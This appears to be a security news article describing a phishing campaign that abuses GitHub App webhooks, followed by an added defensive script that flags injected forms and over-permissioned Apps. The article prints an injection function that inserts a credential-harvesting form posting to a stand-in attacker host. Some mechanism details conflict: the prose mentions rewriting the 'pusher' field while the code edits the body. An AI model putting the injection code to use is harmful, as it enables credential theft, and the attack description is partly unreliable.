In recent weeks, security researchers have uncovered an elaborate phishing campaign that leverages legitimate GitHub notification mechanisms to deliver malicious content.
Victims receive seemingly authentic repository alerts, complete with real-looking commit messages and collaborator updates. Upon closer inspection, the notification headers reveal altered sender addresses and obfuscated links.
The campaign’s sophistication has allowed it to slip past many email gateways, leading to a surge in compromised credentials among developers and IT staff.
Initial reports emerged when multiple open-source maintainers reported unexpected password resets and unauthorized repository forks. H4x0r.DZ identified the malware variant responsible for intercepting GitHub webhook notifications and appending phishing payloads.
Unlike typical phishing emails, these messages pass DKIM and SPF checks because they exploit misconfigurations in third-party GitHub Apps rather than spoofing the sender domain outright.
Recipients clicking the embedded link are redirected through a chain of URL shorteners before landing on a credential-harvesting page.
Analysis of the phishing emails shows that the malware injects custom HTML forms into the GitHub notification template.
The form’s action attribute points to a URL under the attacker’s control, while JavaScript code captures the entered credentials and relays them via an AJAX POST request.
The core infection vector hinges on compromised GitHub Apps with overly broad webhook permissions.
Attackers first identify popular repositories that allow external Apps to subscribe to push events.
By registering a malicious App under a plausible name, they gain event subscriptions and acquire a webhook secret.
The attacker’s server verifies the signature on incoming JSON payloads with that secret, then rewrites the “pusher” field to insert malicious HTML before forwarding the notification to GitHub’s email service.
A simplified version of the injection logic appears below:
// Injection logic as reported: the attacker's server rewrites the notification
// body carried in the webhook payload so that a credential-harvesting form is
// inserted inside the first block-level element of the template.
function modifyPayload(payload) {
  const template = payload.body;
  const phishingForm = `<form action="https://evil.example.com/collect" method="POST">
<input name="username" placeholder="User Name"/>
<input type="password" name="password" placeholder="Password"/>
<button type="submit">Confirm</button>
</form>`;
  // String.prototype.replace with a string pattern replaces only the first
  // '</div>', so the form lands just before the first closing div.
  payload.body = template.replace('</div>', `${phishingForm}</div>`);
  return payload;
}
The webhook injection flow traces the manipulation of webhook payloads end to end. Once credentials are harvested, attackers can access private repositories, escalate privileges, and deploy further malware.
Detection strategies should focus on monitoring unusual webhook registrations, validating App permission scopes, and inspecting outbound email content for embedded forms.
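Two of those detection strategies, as an added example that is not part of the original article: an outbound-mail check that extracts every form action from a notification body and flags any that post outside GitHub's own hosts, and an audit of GitHub App installation records that flags write-level permissions a notification-only integration has no reason to hold. The host allow-list, the high-risk permission set, the record shape and the sample inputs are assumptions for the demo; the permission names used (contents, administration, members, secrets, checks) are GitHub App permission keys.

```javascript
// Added example (not from the original article): detection checks for
// injected credential forms in notification mail and over-permissioned Apps.
const ALLOWED_FORM_HOSTS = new Set(['github.com', 'www.github.com']); // assumed allow-list

// Return every form action attribute found in an HTML body. A regex is enough
// here because only attribute values are needed, not a DOM; double-quoted,
// single-quoted and unquoted values are handled.
function extractFormActions(html) {
  const actions = [];
  const formRe = /<form\b[^>]*\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    actions.push(m[1] ?? m[2] ?? m[3]);
  }
  return actions;
}

// Flag forms whose action posts to a host outside the allow-list. Relative
// actions resolve against the sender's web origin; unparsable ones are flagged
// rather than skipped so a malformed URL cannot slip past the filter.
function findSuspiciousForms(html, senderOrigin = 'https://github.com') {
  const findings = [];
  for (const action of extractFormActions(html)) {
    let host;
    try {
      host = new URL(action, senderOrigin).hostname.toLowerCase();
    } catch {
      findings.push({ action, reason: 'unparsable action URL' });
      continue;
    }
    if (!ALLOWED_FORM_HOSTS.has(host)) {
      findings.push({ action, reason: `posts to ${host}` });
    }
  }
  return findings;
}

// Permissions a notification-only App should never hold at write level (assumed policy).
const HIGH_RISK_WRITE = ['contents', 'administration', 'members', 'secrets'];

// Audit installation records of the assumed shape
// { app_slug, permissions: { <permission>: 'read' | 'write' } }.
function auditInstallations(installations) {
  const findings = [];
  for (const inst of installations) {
    const perms = inst.permissions || {};
    const writes = HIGH_RISK_WRITE.filter((p) => perms[p] === 'write');
    if (writes.length > 0) {
      findings.push({ app: inst.app_slug, reason: `write access to ${writes.join(', ')}` });
    }
  }
  return findings;
}

// Constructed sample notification: a plausible push alert with an injected
// credential form of the kind the article describes.
const SAMPLE_EMAIL_HTML = `
<div class="commit"><p>octocat pushed 2 commits to main</p>
<a href="https://github.com/example-org/example-repo/compare/abc...def">View changes</a>
<form action="https://evil.example.com/collect" method="POST">
<input name="username"/><input type="password" name="password"/>
<button type="submit">Confirm</button></form></div>`;

// Constructed sample installation records for the audit.
const SAMPLE_INSTALLATIONS = [
  { app_slug: 'ci-status-bot', permissions: { checks: 'write', contents: 'read' } },
  { app_slug: 'repo-notifier', permissions: { contents: 'write', members: 'write' } },
];

console.log(findSuspiciousForms(SAMPLE_EMAIL_HTML));
console.log(auditInstallations(SAMPLE_INSTALLATIONS));
```

Run the form check on the rendered HTML that actually leaves the mail gateway, not on the template source, since the injection happens after templating; and treat the permission audit as a starting point, since an App with read-only scopes can still receive push events and is enough for the notification-rewriting flow described above.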